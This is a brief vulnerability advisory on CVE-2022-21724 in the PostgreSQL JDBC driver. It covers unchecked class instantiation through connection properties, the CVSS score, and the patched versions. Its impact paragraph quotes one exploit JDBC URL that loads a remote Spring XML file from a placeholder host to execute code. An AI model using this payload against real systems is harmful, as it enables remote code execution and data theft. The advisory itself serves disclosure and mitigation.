CVE-2022-21724: 
Java vulnerability analysis and mitigation

pgjdbc, the official PostgreSQL JDBC Driver, was found to contain a security vulnerability (CVE-2022-21724) where the JDBC driver failed to verify if certain classes implemented the expected interface before instantiation. This vulnerability was discovered in early 2022 and affects versions >=REL9.4.1208 and >=42.3.0, with patches released in versions 42.2.25 and 42.3.2 (GitHub Advisory).

The vulnerability stems from the JDBC driver's handling of plugin instances based on class names provided via various connection properties including authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, and sslpasswordcallback. The critical flaw was that the driver would instantiate classes without verifying if they implemented the expected interface. The vulnerability has been assigned a CVSS score of 9.8 (CRITICAL) with a vector of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (NetApp Security).

When successfully exploited, this vulnerability could lead to code execution through arbitrary classes. An attacker who controls the JDBC URL or properties could potentially execute malicious code, leading to disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS). For example, an attacker could exploit this using an out-of-the-box class from Spring Framework: 'jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml' (GitHub Advisory).

The vulnerability has been fixed in versions 42.2.25 and 42.3.2 of the PostgreSQL JDBC Driver. Users are strongly advised to upgrade to these patched versions or later. Various distributions have also released security updates, including Debian which fixed the issue in version 42.2.15-1+deb11u1 for the stable distribution and version 42.2.5-2+deb10u1 for the oldstable distribution (Debian Security).